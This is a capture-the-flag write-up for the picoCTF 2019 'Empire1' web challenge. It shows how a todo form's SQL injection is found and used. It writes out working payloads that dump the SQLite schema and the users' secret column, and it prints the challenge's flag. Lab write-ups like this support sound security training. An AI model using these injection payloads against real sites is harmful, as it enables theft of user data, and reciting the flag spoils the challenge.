Empire1
Point: 400
Category
Web Exploitation
Question
Psst, Agent 513, now that you're an employee of Evil Empire Co., try to get their secrets off the company website. https://2019shell1.picoctf.com/problem/37779/ (link) Can you first find the secret code they assigned to you? or http://2019shell1.picoctf.com:37779
Hint
Pay attention to the feedback you get
There is very limited filtering in place - this to stop you from breaking the challenge for yourself, not for you to bypass.
The database gets reverted every 2 hours if you do break it, just come back later
Solution
After registered and signed in, we've seen a nav bar with Add a Todo, Your Todos, Employee Listing. It doesn't seem to contain any vulnerability.
Trying to add something to TODO, we've got this
<h1 class="page-header">Things You Gotta Do</h1>
<ul class="list-unstyled">
<div class="row">
<div class="col-md-6">
<div class="well well-sm">
<li>
<strong>Very Urgent:</strong> Hello
</li>
</div>
</div>
</div>We've seen The "Very Urgent:" prefix is automatically prepended to any text provided by the user. After trying different strategies, I found that the page is vulnerable to SQL injection using the following syntax: '||(SQL)||'
The first time, I've tried with ' || (SELECT group_concat(sql) FROM sqlite_master) || ', then we got this
CREATE TABLE user ( id INTEGER NOT NULL, username VARCHAR(64), name VARCHAR(128), password_hash VARCHAR(128), secret VARCHAR(128), admin INTEGER, PRIMARY KEY (id) ),CREATE UNIQUE INDEX ix_user_username ON user (username),CREATE TABLE todo ( id INTEGER NOT NULL, item VARCHAR(256), user_id INTEGER, PRIMARY KEY (id), FOREIGN KEY(user_id) REFERENCES user (id) )I saw secret VARCHAR(128), then I tried ' || (SELECT group_concat(secret) FROM user) || '. BOOM!, go to Your Todos tab, we got the flag Very Urgent: Likes Oreos.,Know it all.,picoCTF{wh00t_it_a_sql_injecta4dfbd62}
Flag
picoCTF{wh00t_it_a_sql_injecta4dfbd62}
Last updated